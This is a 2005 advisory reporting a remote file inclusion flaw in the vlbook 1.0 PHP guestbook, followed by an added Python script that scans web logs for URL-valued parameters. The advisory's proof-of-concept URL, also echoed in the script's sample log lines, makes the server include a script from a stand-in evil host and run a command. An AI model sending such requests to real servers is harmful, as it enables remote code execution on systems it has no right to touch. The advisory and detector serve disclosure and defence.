A remote file inclusion vulnerability was found in the vlbook 1.0 guestbook.
`------------------------------------------------------
Nightmare TeAmZ Advisory 005
------------------------------------------------------
Date - 10/2005
vlbook Remote File Inclusion
AFFECTED PRODUCTS
=================
vlbook 1.0 Guestbook
http://vlbook.com/
OVERVIEW
========
The vlbook is a free, open source and light-weight guestbook written in PHP
using flat files to store messages and settings. It comes with an install
script for quick and effortless installation.
DETAILS
=======
1. Remote File Inclusion
POC
===
1. Remote File Inclusion
Example
-------
1. Remote File Inclusion
Vulnerable Path:
/index.php?user=
Example:
www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=http://www.[Evil-Site].org/cmd.php?&cmd=id
Credits
=======
This vulnerability was discovered and researched by
BiPi_HaCk, Advisory by Sub_Z3r0 of Nightmare TeAmZ,
Site: http://www.NightmareTeAmZ.altervista.org
`
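A log check for the request shape shown in the advisory's example, added here as an illustration and not part of the original advisory: it flags requests in which any query parameter value is an absolute URL, including percent-encoded and mixed-case forms. The combined log format, the sample lines, and the hosts and addresses in them are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# URL schemes PHP can fetch through its stream wrappers when remote includes are enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Request field of a common/combined access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(name, value)] for query parameters whose value is an absolute URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        value = unquote(value)
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Return [(line_number, client, hits)] for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((number, line.split(" ", 1)[0], hits))
    return findings

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2005:10:01:00 +0000] "GET /guestbook/index.php?user=english&l=1&t=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2005:10:02:13 +0000] "GET /guestbook/index.php?user=english&l=1&t=1&a=http://files.example/x.txt?&cmd=id HTTP/1.1" 200 312',
    '198.51.100.7 - - [12/Oct/2005:10:02:40 +0000] "GET /guestbook/index.php?user=english&a=hTTp%3A%2F%2Ffiles.example%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [12/Oct/2005:10:05:02 +0000] "GET /guestbook/index.php?user=english&ref=docs/http.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, client, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {client} sent URL-valued parameter(s): {hits}")
```

A parameter that legitimately carries a URL (a redirect target, for instance) will also be flagged, so review hits against what each script is expected to accept.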